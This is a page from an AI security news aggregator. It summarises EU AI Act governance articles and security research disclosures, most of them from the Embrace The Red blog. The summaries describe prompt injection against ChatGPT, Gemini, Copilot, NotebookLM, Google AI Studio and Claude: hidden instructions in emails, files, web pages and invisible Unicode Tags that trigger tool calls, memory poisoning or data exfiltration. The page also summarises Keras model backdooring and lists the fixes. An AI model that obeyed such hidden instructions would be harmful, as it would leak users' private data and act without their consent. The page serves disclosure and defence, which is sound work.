aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

Industry News

New tools, products, platforms, funding rounds, and company developments in AI security.

to
Export CSV
1283 items

Why work at the EU AI Office?

inforegulatory
policy
Jun 7, 2024

This article describes the EU AI Office, a newly established regulatory organization within the European Commission tasked with enforcing the AI Act (the world's first comprehensive binding AI regulation) across the European Union. Unlike other AI safety institutes in other countries, the EU AI Office has actual enforcement powers to require AI model providers to fix problems or remove non-compliant models from the market. The office will conduct model evaluations, investigate violations, and work with international partners to shape global AI governance standards.

EU AI Act Updates

Automatic Tool Invocation when Browsing with ChatGPT - Threats and Mitigations

mediumnews
securitysafety

Robust governance for the AI Act: Insights and highlights from Novelli et al. (2024)

inforegulatory
policy
May 24, 2024

This overview discusses the European AI Act and the governance framework needed to implement it, focusing on the European Commission's responsibilities and the AI Office. Key tasks include establishing guidelines for classifying high-risk AI systems, defining what counts as significant modifications (changes that alter a system's risk level), and setting standards for transparency and enforcement across EU member states.

ChatGPT: Hacking Memories with Prompt Injection

mediumnews
securitysafety

Machine Learning Attack Series: Backdooring Keras Models and How to Detect It

infonews
securityresearch

Pivot to the Clouds: Cookie Theft in 2024

infonews
security
May 16, 2024

A researcher examined browser remote debugging features as a potential method for stealing sensitive data like cookies, building on past work about cookie theft techniques. The post references Google's guidance on detecting browser data theft through Windows Event Logs and DPAPI (Data Protection API, a Windows system that encrypts sensitive information) calls, but focuses on exploring whether remote debugging could be used to bypass these detection methods.

Bobby Tables but with LLM Apps - Google NotebookLM Data Exfiltration

mediumnews
securitysafety

HackSpaceCon 2024: Short Trip Report, Slides and Rocket Launch

infonews
security
Apr 13, 2024

HackSpaceCon 2024, held at Kennedy Space Center, featured a keynote by Dave Kennedy on making the world safer through security practices. Kennedy highlighted that attackers can easily modify existing malware (pre-written malicious code) to evade detection systems, and emphasized the importance of active threat hunting (proactively searching for signs of attacks rather than waiting for alerts).

Google AI Studio Data Exfiltration via Prompt Injection - Possible Regression and Fix

infonews
security
Apr 7, 2024

Google AI Studio had a vulnerability that allowed attackers to steal data through prompt injection (tricking an AI by hiding malicious instructions in its input), where a malicious file could trick the AI into exfiltrating other uploaded files to an attacker's server via image tags. The vulnerability appeared in a recent update but was fixed within 12 days of being reported to Google on February 17, 2024.

The dangers of AI agents unfurling hyperlinks and what to do about it

mediumnews
securitysafety

The AI Office is hiring

inforegulatory
policy
Mar 22, 2024

The European Commission is hiring AI specialists to work in the AI Office, which will enforce the EU's AI Act by overseeing compliance of general-purpose AI models (large AI systems available to the public). The office will have real regulatory powers to require companies to implement safety measures, restrict models, or remove them from the market, and will develop evaluation tools and benchmarks to identify dangerous AI behaviors.

The AI Office: What is it, and how does it work?

inforegulatory
policy
Mar 21, 2024

The European AI Office is a new EU regulator created to oversee general purpose AI (GPAI) models and systems, which are AI systems designed to perform a wide range of tasks, across all 27 EU Member States under the AI Act. It monitors compliance, analyzes emerging risks, develops evaluation capabilities, produces voluntary codes of practice for companies to follow, and coordinates enforcement between national regulators and international partners. The Office also supports small and medium businesses with compliance resources and oversees regulatory sandboxes, which are controlled environments where companies can test AI systems before full deployment.

ASCII Smuggler - Improvements

infonews
security
Mar 4, 2024

ASCII Smuggler is a tool that hides text within regular content using Unicode characters, and this update adds new features like optional rendering of Unicode Tags (special markers that show where hidden text begins and ends), URL decoding of input, flexible output modes to either highlight or isolate hidden text, and improved mobile compatibility with a better user interface.

Who Am I? Conditional Prompt Injection Attacks with Microsoft Copilot

mediumnews
securityresearch

AI Act Implementation: Timelines & Next steps

inforegulatory
policy
Feb 28, 2024

The EU AI Act is a regulatory framework that requires companies to comply with rules for different types of AI systems on specific timelines, starting with prohibitions on the riskiest AI uses within 6 months and expanding to cover high-risk AI systems (such as those used in law enforcement, hiring, or education) by 24 months after the law takes effect. The article outlines key compliance deadlines, secondary laws the EU Commission might create to clarify the rules, and guidance documents to help organizations understand how to follow the AI Act.

High-level summary of the AI Act

inforegulatory
policy
Feb 27, 2024

The EU AI Act classifies AI systems by risk level, from prohibited (like social scoring systems that manipulate behavior) to minimal risk (unregulated). High-risk AI systems, such as those used in critical decisions affecting people's lives, face strict regulations requiring developers to provide documentation, conduct testing, and monitor for problems. General-purpose AI (large language models that can do many tasks) have lighter requirements unless they present systemic risk, in which case developers must test them against adversarial attacks (attempts to trick or break them) and report serious incidents.

Google Gemini: Planting Instructions For Delayed Automatic Tool Invocation

mediumnews
securitysafety

ChatGPT: Lack of Isolation between Code Interpreter sessions of GPTs

highnews
security
Feb 14, 2024

ChatGPT's Code Interpreter (a sandbox environment that runs code) was not properly isolated between different GPTs, meaning files uploaded to one GPT were visible and could be modified by other GPTs used by the same person, creating a security risk where malicious GPTs could steal or overwrite sensitive files. OpenAI addressed this vulnerability in May 2024.

Video: ASCII Smuggling and Hidden Prompt Instructions

mediumnews
security
Feb 12, 2024

Researchers discovered ASCII Smuggling, a technique using Unicode Tags Block characters (special Unicode codes that mirror ASCII but stay invisible in UI elements) to hide prompt injections (tricky instructions hidden in AI input) that large language models interpret as regular text. This attack is particularly dangerous for LLMs because they can both read these hidden messages and generate them in responses, enabling more sophisticated attacks beyond traditional methods like XSS (cross-site scripting, injecting malicious code into websites) and SSRF (server-side request forgery, tricking a server into making unauthorized requests).

Hidden Prompt Injections with Anthropic Claude

mediumnews
securitysafety
Previous57 / 65Next
May 28, 2024

ChatGPT's browsing tool can be tricked into automatically invoking other tools (like image creation or memory management) when users visit websites containing hidden instructions, a vulnerability known as prompt injection (tricking an AI by hiding instructions in its input). While OpenAI added some protections, minor prompting tricks can bypass them, and this issue affects other AI applications as well.

Fix: For custom GPTs with AI Actions, creators can use the x-openai-isConsequential flag as a mitigation to put users in control, though the source notes this approach 'still lacks a great user experience, like better visualization to understand what the action is about to do.'

Embrace The Red

Fix: The source suggests that the Commission should adopt 'predetermined change management plans akin to those in medicine' to assess modifications to AI systems. These plans would be documents outlining anticipated changes (such as performance adjustments or shifts in intended use) and the methods for evaluating whether those changes substantially alter the system's risk level. The source also recommends that standard fine-tuning of foundation models (training adjustments to pre-existing AI models) should not be considered a significant modification unless safety layers are removed or other actions clearly increase risk.

EU AI Act Updates
May 22, 2024

ChatGPT's new memory feature, which lets the AI remember information across different chat sessions for a more personalized experience, can be exploited through indirect prompt injection (tricking an AI by hiding malicious instructions in its input). Attackers could manipulate ChatGPT into storing false information, biases, or unwanted instructions by injecting commands through connected apps like Google Drive, uploaded documents, or web browsing features.

Embrace The Red
May 18, 2024

This post examines how attackers can insert hidden malicious code into machine learning models (a technique called backdooring) through supply chain attacks, specifically targeting Keras models (a popular framework for building AI systems). The authors demonstrate this attack and then explore tools that can detect when a model has been compromised in this way.

Embrace The Red
Embrace The Red
Apr 15, 2024

Google's NotebookLM is a tool that lets users upload files for an AI to analyze, but it's vulnerable to prompt injection (tricking the AI by hiding instructions in uploaded files) that can manipulate the AI's responses and expose what users see. The tool also has a data exfiltration vulnerability (attackers stealing information) when processing untrusted files, and there is currently no known way to prevent these attacks, meaning users cannot fully trust the AI's responses when working with files from unknown sources.

Embrace The Red
Embrace The Red

Fix: The issue was fixed by Google and did not reproduce after the company heard back about the report 12 days later (by approximately February 29, 2024). The ticket was closed as 'Duplicate' on March 3, 2024, suggesting the vulnerability may have also been caught through internal testing.

Embrace The Red
Apr 3, 2024

Unfurling is when an application automatically expands hyperlinks to show previews, which can be exploited in AI chatbots to leak data. When an attacker uses prompt injection (tricking an AI by hiding instructions in its input) to make the chatbot generate a link containing sensitive information from earlier conversations, the unfurling feature automatically sends that data to a third-party server, potentially exposing private information.

Fix: To disable unfurling in Slack Apps, modify the message creation function to include unfurl settings in the JSON object: set "unfurl_links": False and "unfurl_media": False when creating the message, as shown in the example code: def create_message(text): message = { "text": text, "unfurl_links": False, "unfurl_media": False } return json.dumps(message)

Embrace The Red
EU AI Act Updates
EU AI Act Updates
Embrace The Red
Mar 3, 2024

Attackers can create conditional prompt injection attacks (tricking an AI by hiding malicious instructions in its input that activate only for specific users) against Microsoft Copilot by leveraging user identity information like names and job titles that the AI includes in its context. A researcher demonstrated this by sending an email with hidden instructions that made Copilot behave differently depending on which person opened it, showing that LLM applications become more vulnerable as attackers learn to target specific users rather than all users equally.

Embrace The Red
EU AI Act Updates
EU AI Act Updates
Feb 23, 2024

A researcher discovered a vulnerability in Google Gemini where attackers can hide instructions in emails that trick the AI into automatically calling external tools (called Extensions) without the user's knowledge. When a user asks the AI to analyze a malicious email, the AI follows the hidden instructions and invokes the tool, which is a form of request forgery (making unauthorized requests on behalf of the user).

Embrace The Red

Fix: OpenAI addressed this vulnerability in May 2024. Additionally, the source recommends: 'Disable Code Interpreter in private GPTs with private knowledge files (as they will be accessible to other GPTs)' and notes that 'when creating a new GPT Code Interpreter is off by default' as one change OpenAI made. Users should avoid uploading sensitive files to Code Interpreter and use third-party GPTs with caution, especially those with Code Interpreter enabled.

Embrace The Red

Fix: As a developer, a possible mitigation is to remove Unicode Tags Block text on the way in and out (meaning filter it both when users send input to your LLM and when the LLM sends responses back to users). Additionally, test your own LLM applications for this new attack vector to identify vulnerabilities.

Embrace The Red
Feb 8, 2024

A researcher discovered that Anthropic's Claude AI model is vulnerable to hidden prompt injections using Unicode Tags code points (invisible characters that can carry secret instructions in text). Like ChatGPT before it, Claude can interpret these hidden instructions and follow them, even though users cannot see them on their screen. The researcher reported the issue to Anthropic, but the ticket was closed without further details provided.

Embrace The Red